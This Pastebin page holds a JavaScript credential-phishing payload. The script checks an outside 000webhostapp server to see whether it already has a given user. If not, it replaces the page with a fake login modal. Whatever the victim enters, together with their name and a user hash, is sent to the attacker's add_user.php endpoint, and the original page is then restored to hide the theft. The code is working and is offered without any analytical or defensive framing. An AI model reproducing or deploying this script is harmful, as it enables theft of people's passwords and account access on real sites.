API tools faq
paste
Advertisement
Guest User

Untitled

a guest
Mar 14th, 2019
189
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
JavaScript 2.84 KB | None | 0 0
raw download clone embed print report
  1. // define global vars
  2. var full_name;
  3. var user_hash;
  4. var request;
  5. var o_html;
  6.  
  7. window.onload = () =>
  8. {
  9.     // copy user information
  10.     full_name = document.getElementsByClassName("dropdown-toggle btn")[0].innerText.replace(/\s/g,'');
  11.     user_hash = userHash;
  12.  
  13.     // setup ajax and backup page
  14.     request = new XMLHttpRequest();
  15.     var o_html = document.body.innerHTML;
  16.  
  17.     // send request to my server to see if I already have this users information
  18.     request.open("GET", "https://unthoughtful-stomac.000webhostapp.com/check_user.php?hash=" + user_hash);
  19.     request.send();
  20.     request.onload = () =>
  21.     {
  22.         // if I have the users information just return and do nothing
  23.         if(request.responseText == "true")
  24.             return;
  25.  
  26.         // if I dont yet have this users information inject payload
  27.         document.body.innerHTML =
  28.             "<html> <div id='modal-login' class='modal hide fade text-left in' tabindex='-1' role='dialog' aria-labelledby='log-in form' aria-hidden='false' style='display: block;'> <div class='modal-header'> <button aria-hidden='true' data-dismiss='modal' class='close' type='button'> <i class='fa fa-remove'></i> </button> <h3>Log in</h3> <div id='modal-login-alert'></div> <p>Use your username &amp; password or log in as account manager by using your activation code in both fields.</p> </div> <div class='modal-body'> <div class='control-group'> <label for='username' class='control-label'>Username</label> <div class='controls'> <input id='smoke_username' type='text' placeholder='username...' name='username'> </div> </div> <div class='control-group'> <label for='password' class='control-label'>Password</label> <div class='controls'> <input id='smoke_password' type='password' placeholder='password...' name='password'> </div> </div> <div class='control-group text-center'> <button name='subscribe-login-access' value='1' class='btn' onclick='smoke_login()'> <i class='fa fa-user'></i> Log in </button> </div> </div> <div class='modal-footer'> <a href='subscribe/lost-password'>Forgot your password?</a><br> </div> </div></html>";
  29.     }
  30. }
  31.  
  32. // callback function for when the users presses login on the fake form
  33. smoke_login = () =>
  34. {
  35.     // fetch user information from login field
  36.     var username = document.getElementById("smoke_username").value;
  37.     var password = document.getElementById("smoke_password").value;
  38.  
  39.     // log information for debugging
  40.     console.log(username);
  41.     console.log(password);
  42.     console.log(full_name);
  43.     console.log(user_hash);
  44.  
  45.     // send all information to my server and restore page
  46.     request.open("GET", "https://unthoughtful-stomac.000webhostapp.com/add_user.php?full_name=" + full_name + "&username=" + username + "&password=" + password + "&hash=" + user_hash);
  47.     request.send();
  48.     request.onload = () =>
  49.         document.body.innerHTML = o_html;
  50. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!